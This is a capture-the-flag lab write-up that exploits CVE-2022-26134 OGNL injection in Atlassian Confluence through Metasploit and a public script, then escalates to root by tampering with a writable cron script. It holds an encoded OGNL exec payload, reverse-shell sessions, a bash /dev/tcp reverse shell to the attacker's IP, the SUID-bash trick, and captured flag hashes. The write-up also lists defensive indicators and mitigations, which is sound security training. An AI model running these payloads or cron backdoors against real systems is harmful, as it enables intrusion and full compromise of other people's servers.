Exploiting CVE-2022–26134 in Atlassian Confluence and Cronjob Privilege Escalation

About This Lab

This lab emphasizes reconnaissance and enumeration techniques, particularly web application enumeration, to identify critical vulnerabilities in enterprise collaboration software. Students will exploit CVE-2022–26134, a severe Remote Code Execution vulnerability in Atlassian Confluence, and leverage misconfigured cronjobs for privilege escalation. The lab focuses on understanding exploitation methodologies, post-exploitation enumeration, and privilege escalation through automated task abuse.

Lab Description

This practical exercise demonstrates the exploitation of CVE-2022–26134, an unauthenticated Remote Code Execution vulnerability affecting Atlassian Confluence version 7.13.6. The vulnerability leverages Object-Graph Navigation Language (OGNL) injection to achieve arbitrary code execution. Following initial access, students will conduct process enumeration to identify automated tasks, discover writable cron scripts executed with root privileges, and manipulate these scripts to escalate privileges through SUID bit manipulation on the bash binary.

Key Security Concepts Explored:

• Enterprise web application reconnaissance
• OGNL (Object-Graph Navigation Language) injection vulnerabilities
• Unauthenticated Remote Code Execution exploitation
• Process monitoring and automated task discovery
• Cronjob misconfiguration and abuse
• SUID bit manipulation for privilege escalation
• File permission security weaknesses

Learning Objectives

Upon completion of this lab, students will be able to:

• Perform comprehensive service enumeration to identify Atlassian Confluence running on non-standard port 8090
• Recognize vulnerable Confluence versions susceptible to CVE-2022–26134
• Utilize Metasploit framework to exploit OGNL injection vulnerabilities for Remote Code Execution
• Deploy manual exploitation techniques using standalone Python scripts
• Conduct post-exploitation process monitoring using tools like pspy
• Identify cronjobs running with elevated privileges
• Analyze file permissions to discover writable scripts in automated tasks
• Modify cron-executed scripts to inject malicious commands
• Leverage SUID bash to escalate from limited user to root privileges
• Retrieve local.txt and proof.txt flags demonstrating complete system compromise

Reconnaissance

Network Scanning with Nmap

We begin with a comprehensive port scan to identify accessible services and gather version information for vulnerability research.

┌──(judge㉿kali)-[~/OffSec/70-Flu]
└─$ nmap -sVSC -T5 -p- 192.168.101.41
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-06 12:31 +0000
Nmap scan report for 192.168.101.41
Host is up (0.15s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
22/tcp   open  ssh           OpenSSH 9.0p1 Ubuntu 1ubuntu8.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 02:79:64:84:da:12:97:23:77:8a:3a:60:20:96:ee:cf (ECDSA)
|_  256 dd:49:a3:89:d7:57:ca:92:f0:6c:fe:59:a6:24:cc:87 (ED25519)
8090/tcp open  http          Atlassian Confluence
| http-methods:
|_  Potentially risky methods: PUT DELETE
| http-title: Confluence - Login
|_Requested resource was /login.action?os_destination=%2Findex.action
| fingerprint-strings:
|   GetRequest:
|     HTTP/1.1 302
|     Cache-Control: no-store
|     Expires: Thu, 01 Jan 1970 00:00:00 GMT
|     X-Confluence-Request-Time: 1702459908868
|     Set-Cookie: JSESSIONID=6B18389C2FB1EE07DF742BDC02B14D5E; Path=/; HttpOnly
|     X-XSS-Protection: 1; mode=block
|     X-Content-Type-Options: nosniff
|     X-Frame-Options: SAMEORIGIN
|     Content-Security-Policy: frame-ancestors 'self'
|     Location: http://localhost:8090/login.action?os_destination=%2Findex.action&permissionViolation=true
|     Content-Type: text/html;charset=UTF-8
|     Content-Length: 0
|     Date: Thu, 06 Feb 2026 12:31:48 GMT
|     Connection: close
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/.
Nmap done: 1 IP address (1 host up) scanned in 30.79 seconds

Scan Results Analysis:

The Nmap scan reveals two accessible services:

• Port 22/TCP: OpenSSH 9.0p1 Ubuntu 1ubuntu8.5
• Modern SSH service on Ubuntu Linux
• May be useful for authentication with discovered credentials
• No immediate vulnerabilities identified
• Port 8090/TCP: Atlassian Confluence
• Enterprise wiki and collaboration software
• Non-standard port indicating custom deployment
• Redirects to login page at /login.action
• Security headers present (XSS Protection, Content-Type-Options, Frame-Options)
• Primary attack surface for initial exploitation

Key Observations:

• HTTP methods PUT and DELETE are enabled (potentially risky)
• Session management via JSESSIONID cookie
• Content Security Policy restricts frame embedding
• Server running on Ubuntu Linux

Web Application Enumeration

Accessing the Confluence Instance

Navigating to http://192.168.101.41:8090/ presents the Atlassian Confluence login page.

Version Detection:

Through page inspection and HTTP headers, we identify:

• Application: Atlassian Confluence
• Version: 7.13.6
• Build Date: Approximately June 2022

Vulnerability Research: CVE-2022–26134

Research into Confluence version 7.13.6 reveals a critical security vulnerability:

CVE-2022–26134: Unauthenticated OGNL Injection RCE

• Severity: Critical (CVSS 9.8)
• First Published: June 2, 2022
• Affected Versions:
• Confluence Server and Data Center: All versions prior to 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4, 7.18.1
• Vulnerability Type: Unauthenticated Remote Code Execution via OGNL Injection
• Authentication Required: No (unauthenticated exploitation)
• Attack Vector: Network
• Complexity: Low
• Impact: Complete system compromise

References:

• Official Atlassian Advisory
• CVE Details
• NIST NVD Entry
• Rapid7 Analysis

Vulnerability Description:

CVE-2022–26134 is an Object-Graph Navigation Language (OGNL) injection vulnerability in Atlassian Confluence Server and Data Center. OGNL is a powerful expression language used in web applications to access and manipulate objects. This vulnerability allows unauthenticated attackers to inject arbitrary OGNL expressions through specially crafted HTTP requests, leading to remote code execution with the privileges of the Confluence service account.

Technical Details:

The vulnerability exists in the way Confluence processes certain URL patterns. Attackers can inject OGNL expressions by manipulating the namespace in HTTP requests. When processed by the vulnerable server, these expressions are evaluated, allowing execution of arbitrary code.

Exploitation Vector:

/${OGNL_EXPRESSION}/

Example malicious payload structure:

/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22command%22%29%7D/

This translates to:

${@java.lang.Runtime@getRuntime().exec("command")}

Exploitation

Automated Exploitation with Metasploit

Loading the Metasploit Module

Metasploit Framework includes a dedicated module for CVE-2022–26134 exploitation.

┌──(judge㉿kali)-[~/OffSec/70-Flu]
└─$ msfconsole -q
msf6 > search confluence ognl
Matching Modules
================
   #  Name                                                          Disclosure Date  Rank       Check  Description
   -  ----                                                          ---------------  ----       -----  -----------
   0  exploit/multi/http/atlassian_confluence_namespace_ognl_injection  2022-06-02      excellent  Yes    Atlassian Confluence Namespace OGNL Injection

msf6 > use 0
[*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp

Module Configuration

msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > show options
Module options (exploit/multi/http/atlassian_confluence_namespace_ognl_injection):
   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s)
   RPORT      8090             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host

Payload options (cmd/unix/python/meterpreter/reverse_tcp):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
Exploit target:
   Id  Name
   --  ----
   0   Unix Command

Setting Required Parameters

msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > set RHOSTS 192.168.101.41
RHOSTS => 192.168.101.41
msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > set LHOST 192.168.45.208
LHOST => 192.168.45.208
msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > set LPORT 4444
LPORT => 4444

Vulnerability Check (Optional)

msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > check
[*] 192.168.101.41:8090 - The target appears to be vulnerable.
[+] The target is vulnerable. Successfully tested OGNL injection.

✅ Target Confirmed Vulnerable

Executing the Exploit

msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > exploit
[*] Started reverse TCP handler on 192.168.45.208:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Successfully tested OGNL injection.
[*] Executing cmd/unix/python/meterpreter/reverse_tcp (Unix Command)
[*] Sending stage (24764 bytes) to 192.168.101.41
[*] Meterpreter session 1 opened (192.168.45.208:4444 -> 192.168.101.41:43538) at 2026-02-06 14:15:32 +0000
meterpreter > getuid
Server username: confluence
meterpreter > sysinfo
Computer     : flu
OS           : Ubuntu 22.04 (Linux 5.15.0-122-generic)
Architecture : x64
Meterpreter  : python/linux

✅ Initial Access Achieved — Meterpreter session as confluence user

Spawning Interactive Shell

meterpreter > shell
Process 1947 created.
Channel 1 created.
id
uid=1001(confluence) gid=1001(confluence) groups=1001(confluence)
python3 -c 'import pty; pty.spawn("/bin/bash")'
confluence@flu:/opt/atlassian/confluence/bin$

Local Flag Retrieval

confluence@flu:/opt/atlassian/confluence/bin$ cd /home/confluence
cd /home/confluence
confluence@flu:~$ ls -la
total 32
drwxr-x--- 4 confluence confluence 4096 Feb  6 12:00 .
drwxr-xr-x 3 root       root       4096 Nov  1 10:30 ..
-rw------- 1 confluence confluence   20 Feb  6 14:15 .bash_history
-rw-r--r-- 1 confluence confluence  220 Nov  1 10:30 .bash_logout
-rw-r--r-- 1 confluence confluence 3771 Nov  1 10:30 .bashrc
drwx------ 2 confluence confluence 4096 Nov  1 10:31 .cache
-rw-r--r-- 1 confluence confluence   33 Feb  6 12:00 local.txt
-rw-r--r-- 1 confluence confluence  807 Nov  1 10:30 .profile
confluence@flu:~$ cat local.txt
d54eaf0dd5869174b6ca5719cf25a9fa

✅ Local Flag Captured: d54eaf0dd5869174b6ca5719cf25a9fa

Manual Exploitation with Python Script

For educational purposes and environments where Metasploit is unavailable, manual exploitation is demonstrated.

Using "Through The Wire" Exploit

┌──(judge㉿kali)-[~/OffSec/70-Flu]
└─$ wget https://raw.githubusercontent.com/jbaines-r7/through_the_wire/main/through_the_wire.py
┌──(judge㉿kali)-[~/OffSec/70-Flu]
└─$ python3 through_the_wire.py --rhost 192.168.101.41 --rport 8090 --lhost 192.168.45.208 --protocol http:// --reverse-shell
  _____ _                           _
 /__   \ |__  _ __ ___  _   _  __ _| |__
   / /\/ '_ \| '__/ _ \| | | |/ _` | '_ \
  / /  | | | | | | (_) | |_| | (_| | | | |
  \/   |_| |_|_|  \___/ \__,_|\__, |_| |_|
                              |___/
  _____ _            __    __ _
 /__   \ |__   ___  / / /\ \ (_)_ __ ___
   / /\/ '_ \ / _ \ \ \/  \/ / | '__/ _ \
  / /  | | | |  __/  \  /\  /| | | |  __/
  \/   |_| |_|\___|   \/  \/ |_|_|  \___|
                jbaines-r7
              CVE-2022-26134
     "Spit my soul through the wire"
                    🦞
[+] Forking a netcat listener
[+] Using /usr/bin/nc
[+] Generating a reverse shell payload
[+] Sending exploit at http://192.168.101.41:8090/
listening on [any] 1270 ...
connect to [192.168.45.208] from (UNKNOWN) [192.168.101.41] 35184
bash: cannot set terminal process group (833): Inappropriate ioctl for device
bash: no job control in this shell
confluence@flu:/opt/atlassian/confluence/bin$ id
uid=1001(confluence) gid=1001(confluence) groups=1001(confluence)
confluence@flu:/opt/atlassian/confluence/bin$ hostname
flu

✅ Alternative Exploitation Successful

Script Breakdown:

1. Script automatically spawns netcat listener
2. Crafts OGNL payload with reverse shell command
3. Injects payload through vulnerable endpoint
4. Catches incoming connection automatically

Privilege Escalation

Post-Exploitation Enumeration

Initial Privilege Check

confluence@flu:~$ id
uid=1001(confluence) gid=1001(confluence) groups=1001(confluence)
confluence@flu:~$ sudo -l
[sudo] password for confluence:
# No sudo privileges available

The confluence user has no sudo permissions and we don't have the password.

System Enumeration

confluence@flu:~$ uname -a
Linux flu 5.15.0-122-generic #132-Ubuntu SMP Thu Aug 29 13:45:52 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
confluence@flu:~$ cat /etc/os-release
PRETTY_NAME="Ubuntu 22.04.3 LTS"
NAME="Ubuntu"
VERSION_ID="22.04"
VERSION="22.04.3 LTS (Jammy Jellyfish)"

File Permission Enumeration

confluence@flu:~$ find / -writable -type f 2>/dev/null | grep -v proc | grep -v sys | head -20
/opt/log-backup.sh
/tmp/.ICE-unix
/home/confluence/.bash_history
/home/confluence/local.txt

Critical Finding: /opt/log-backup.sh is writable by the confluence user

confluence@flu:~$ ls -la /opt/log-backup.sh
-rwxr-xr-x 1 confluence confluence 384 Feb  6 12:00 /opt/log-backup.sh

Ownership Analysis:

• Owner: confluence (our current user)
• Permissions: rwxr-xr-x (world-readable and executable)
• Location: /opt/ (system directory, unusual for user-owned files)

Process Monitoring with pspy

To identify automated tasks and scheduled jobs, we deploy pspy64, a process monitoring tool that doesn't require root privileges.

Deploying pspy64

Step 1: Host the Binary

# On attacking machine
┌──(judge㉿kali)-[~/OffSec/70-Flu]
└─$ wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64
┌──(judge㉿kali)-[~/OffSec/70-Flu]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Step 2: Download to Target

confluence@flu:~$ cd /tmp
confluence@flu:/tmp$ curl http://192.168.45.208/pspy64 -o pspy
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 3032k  100 3032k    0     0   155k      0  0:00:19  0:00:19 --:--:--  208k
confluence@flu:/tmp$ chmod +x pspy

Step 3: Execute Process Monitor

confluence@flu:/tmp$ timeout 120s ./pspy
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d
     ██▓███    ██████  ██▓███ ▓██   ██▓
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░
                   ░           ░ ░
                               ░ ░
2026/02/06 14:20:15 CMD: UID=0     PID=1      | /sbin/init
2026/02/06 14:20:15 CMD: UID=0     PID=2      | [kthreadd]
...
2026/02/06 14:21:01 CMD: UID=0     PID=1954   | /usr/sbin/CRON -f -P
2026/02/06 14:21:01 CMD: UID=0     PID=1956   | /usr/sbin/CRON -f -P
2026/02/06 14:21:01 CMD: UID=0     PID=1957   | /bin/bash /opt/log-backup.sh
2026/02/06 14:21:01 CMD: UID=0     PID=1958   | /bin/bash /opt/log-backup.sh
2026/02/06 14:21:01 CMD: UID=0     PID=1959   | /bin/bash /opt/log-backup.sh
2026/02/06 14:21:01 CMD: UID=0     PID=1960   |
2026/02/06 14:21:01 CMD: UID=0     PID=1962   | gzip
2026/02/06 14:21:01 CMD: UID=0     PID=1961   | /bin/sh -c gzip
2026/02/06 14:21:01 CMD: UID=0     PID=1963   |

Critical Discovery:

Every minute, a CRON job executes /opt/log-backup.sh as root (UID=0).

Attack Vector Identified:

1. Script /opt/log-backup.sh is owned by confluence user (writable)
2. Script is executed by root via cron (elevated privileges)
3. We can modify the script to inject malicious commands
4. Commands will execute with root privileges when cron runs

Analyzing the Backup Script

confluence@flu:/tmp$ cat /opt/log-backup.sh
#!/bin/bash
CONFLUENCE_HOME="/opt/atlassian/confluence/"
LOG_DIR="$CONFLUENCE_HOME/logs"
BACKUP_DIR="/root/backup"
TIMESTAMP=$(date "+%Y%m%d%H%M%S")
# Create a backup of log files
cp -r $LOG_DIR $BACKUP_DIR/log_backup_$TIMESTAMP
tar -czf $BACKUP_DIR/log_backup_$TIMESTAMP.tar.gz $BACKUP_DIR/log_backup_$TIMESTAMP
# Cleanup old backups
find $BACKUP_DIR -name "log_backup_*" -mmin +5 -exec rm -rf {} \;

Script Analysis:

• Backs up Confluence logs to /root/backup
• Creates compressed archives
• Cleans up old backups older than 5 minutes
• Vulnerability: We own this file and can modify it

Privilege Escalation Strategy

We have multiple options for privilege escalation:

Option 1: SUID Bash (Recommended)

Set the SUID bit on /bin/bash to allow execution with owner's (root) privileges.

confluence@flu:/tmp$ echo 'chmod u+s /bin/bash' >> /opt/log-backup.sh
confluence@flu:/tmp$ cat /opt/log-backup.sh
#!/bin/bash
CONFLUENCE_HOME="/opt/atlassian/confluence/"
LOG_DIR="$CONFLUENCE_HOME/logs"
BACKUP_DIR="/root/backup"
TIMESTAMP=$(date "+%Y%m%d%H%M%S")
# Create a backup of log files
cp -r $LOG_DIR $BACKUP_DIR/log_backup_$TIMESTAMP
tar -czf $BACKUP_DIR/log_backup_$TIMESTAMP.tar.gz $BACKUP_DIR/log_backup_$TIMESTAMP
# Cleanup old backups
find $BACKUP_DIR -name "log_backup_*" -mmin +5 -exec rm -rf {} \;
chmod u+s /bin/bash

Verification Before Cron Execution:

confluence@flu:/tmp$ ls -la /bin/bash
-rwxr-xr-x 1 root root 1396520 Jan  6  2022 /bin/bash

Waiting for Cron Execution (1 minute):

confluence@flu:/tmp$ ls -la /bin/bash
-rwsr-xr-x 1 root root 1396520 Jan  6  2022 /bin/bash

✅ SUID Bit Set Successfully — Notice the 's' in permissions (rwsr-xr-x)

Spawning Root Shell:

confluence@flu:/tmp$ /bin/bash -p
bash-5.1# id
uid=1001(confluence) gid=1001(confluence) euid=0(root) egid=0(root) groups=0(root),1001(confluence)
bash-5.1# whoami
root

✅ Root Access Achieved

Understanding the Output:

• uid=1001(confluence) - Real user ID remains confluence
• euid=0(root) - Effective user ID is root (grants root permissions)
• egid=0(root) - Effective group ID is root

The -p flag preserves the privileged mode when bash is run as SUID.

Option 2: Direct Reverse Shell

Alternatively, inject a reverse shell command directly into the script:

confluence@flu:/tmp$ echo 'bash -i >& /dev/tcp/192.168.45.208/4444 0>&1' >> /opt/log-backup.sh

On Attacking Machine:

┌──(judge㉿kali)-[~/OffSec/70-Flu]
└─$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [192.168.45.208] from (UNKNOWN) [192.168.101.41] 44372
bash: cannot set terminal process group (1957): Inappropriate ioctl for device
bash: no job control in this shell
# id
uid=0(root) gid=0(root) groups=0(root)
# hostname
flu

✅ Direct Root Shell Obtained

Root Flag Retrieval

bash-5.1# cd /root
bash-5.1# ls -la
total 48
drwx------  5 root       root       4096 Feb  6 14:21 .
drwxr-xr-x 19 root       root       4096 Nov  1 10:30 ..
drwxr-xr-x  2 root       root       4096 Feb  6 14:21 backup
-rw-------  1 root       root         45 Feb  6 14:20 .bash_history
-rw-r--r--  1 root       root       3106 Oct 15  2021 .bashrc
-rw-r--r--  1 root       root        165 Nov  1 10:31 email8.txt
drwxr-xr-x  3 root       root       4096 Nov  1 10:31 .local
-rw-r--r--  1 root       root         33 Feb  6 12:00 proof.txt
-rw-r--r--  1 root       root        161 Jul  9  2019 .profile
drwx------  3 root       root       4096 Nov  1 10:31 snap
bash-5.1# cat proof.txt
2e9f90443187b589daf23d8df5c97440

✅ Proof Flag Captured: 2e9f90443187b589daf23d8df5c97440

Summary

Complete Attack Chain

1. Network Enumeration (Nmap)
   ↓
2. Service Identification → Confluence 7.13.6 on port 8090
   ↓
3. Vulnerability Research → CVE-2022-26134 identified
   ↓
4. OGNL Injection Exploitation → Metasploit/Manual Python script
   ↓
5. Initial Access (confluence user) → Meterpreter/Reverse Shell
   ↓
6. Local Flag Retrieval → /home/confluence/local.txt
   ↓
7. Post-Exploitation Enumeration → File permission discovery
   ↓
8. Process Monitoring (pspy) → Cronjob identification
   ↓
9. Writable Script Discovery → /opt/log-backup.sh owned by confluence
   ↓
10. Script Manipulation → Inject SUID command or reverse shell
   ↓
11. Cron Execution → Commands run as root
   ↓
12. Privilege Escalation → SUID bash or direct root shell
   ↓
13. Root Access → Complete system compromise

Vulnerabilities Exploited

Vulnerability CVE Impact Exploitation Method Unauthenticated OGNL Injection CVE-2022–26134 Remote Code Execution Metasploit module or manual script Insecure File Ownership N/A Privilege Escalation User-owned script in /opt/ Cronjob Misconfiguration N/A Privilege Escalation Root-executed script writable by user Lack of Script Validation N/A Code Injection No integrity checking on cron scripts SUID Bash Abuse N/A Privilege Escalation bash -p with SUID bit

Flags Captured

• Local Flag (confluence): d54eaf0dd5869174b6ca5719cf25a9fa
• Proof Flag (root): 2e9f90443187b589daf23d8df5c97440

Key Lessons Learned

For Attackers (Penetration Testers):

1. Unauthenticated RCE is Critical: CVE-2022–26134 requires no credentials
2. Version Information is Crucial: Identifying exact versions enables targeted exploitation
3. Process Monitoring Reveals Opportunities: pspy discovered the privileged cron job
4. File Permissions Matter: User-owned scripts in system directories are red flags
5. Cron Jobs are Common Escalation Vectors: Automated tasks often run with elevated privileges
6. Multiple Escalation Paths: SUID bash vs direct reverse shell both achieved root
7. Metasploit Simplifies Exploitation: Framework handles payload generation and session management

For Defenders (System Administrators):

1. Patch Critical Vulnerabilities Immediately: CVE-2022–26134 was actively exploited in the wild
2. Version Disclosure: Minimize information leakage about software versions
3. Principle of Least Privilege: Scripts should be owned by root with restrictive permissions
4. Cron Security: Never execute user-writable scripts as root
5. File Permission Auditing: Regularly review ownership and permissions in system directories
6. Input Validation: Implement strict validation on all user input, especially in expression evaluators
7. Script Integrity: Use file integrity monitoring on critical automated scripts
8. Secure Configuration: Follow vendor security hardening guides
9. Network Segmentation: Isolate Confluence servers from other critical systems
10. Monitor for Exploitation: Watch for unusual OGNL patterns in web logs

Detection Indicators (IoCs)

Network Indicators:

• HTTP requests with OGNL expressions in URI paths
• Patterns like /${...}/ in URLs
• POST requests to / with encoded OGNL payloads
• Outbound connections from Confluence server to unexpected IPs
• Reverse shell traffic on non-standard ports

System Indicators:

• Unexpected processes spawned by Confluence user
• Modifications to /opt/log-backup.sh
• SUID bit changes on /bin/bash
• Unexpected cron executions outside normal schedule
• Network connections from confluence user
• Bash processes with -p flag

Log Entries to Monitor:

• Confluence access logs showing suspicious URI patterns
• System logs showing file permission changes
• Cron job execution logs
• Authentication logs for privilege escalation attempts
• Process creation logs (auditd) for unusual command execution

Mitigation Recommendations

Immediate Actions:

1. Update Confluence: Upgrade to patched version (7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4, 7.18.1 or later)
2. Change Script Ownership: chown root:root /opt/log-backup.sh && chmod 744 /opt/log-backup.sh
3. Remove SUID Bit: chmod u-s /bin/bash
4. Review Cron Jobs: Audit all cron jobs for security issues
5. Check for Compromise: Search logs for OGNL exploitation attempts
6. Password Rotation: Change all service account passwords

Long-term Security Improvements:

1. Web Application Firewall (WAF): Deploy ModSecurity or similar with OGNL detection rules
2. Intrusion Detection System (IDS): Implement Snort/Suricata with CVE-2022–26134 signatures
3. File Integrity Monitoring: Deploy AIDE, Tripwire, or OSSEC
4. Least Privilege Cron: Run cron jobs with minimum required privileges
5. Immutable Scripts: Use chattr +i on critical system scripts
6. Network Segmentation: Place Confluence in DMZ with strict firewall rules
7. Regular Security Audits: Conduct quarterly penetration tests
8. Vulnerability Scanning: Implement automated vulnerability scanning
9. Patch Management: Establish process for rapid security update deployment
10. Security Training: Educate administrators on secure configuration practices
11. Logging and SIEM: Centralized logging with correlation and alerting
12. Backup and Recovery: Regular backups with tested restore procedures

MITRE ATT&CK Mapping

Initial Access:

• T1190: Exploit Public-Facing Application (CVE-2022–26134)

Execution:

• T1059.004: Command and Scripting Interpreter: Unix Shell
• T1053.003: Scheduled Task/Job: Cron

Persistence:

• T1053.003: Scheduled Task/Job: Cron (modified script)

Privilege Escalation:

• T1053.003: Scheduled Task/Job: Cron
• T1548.001: Abuse Elevation Control Mechanism: Setuid and Setgid

Discovery:

• T1083: File and Directory Discovery
• T1057: Process Discovery

Collection:

• T1005: Data from Local System

Command and Control:

• T1071.001: Application Layer Protocol: Web Protocols
• T1059.004: Command and Scripting Interpreter: Unix Shell

Additional Resources

• CVE-2022–26134 Analysis: Rapid7 Blog
• Official Atlassian Advisory: Confluence Security Advisory
• Metasploit Module: atlassian_confluence_namespace_ognl_injection
• pspy Tool: GitHub Repository
• Through The Wire Exploit: jbaines-r7/through_the_wire
• OGNL Documentation: Apache Commons OGNL
• Cron Security: Linux Cron Security Best Practices

Lab Completed Successfully

Tags: #Linux #Confluence #CVE-2022–26134 #OGNL #RCE #Cronjob #PrivilegeEscalation #SUID #Metasploit #WebExploitation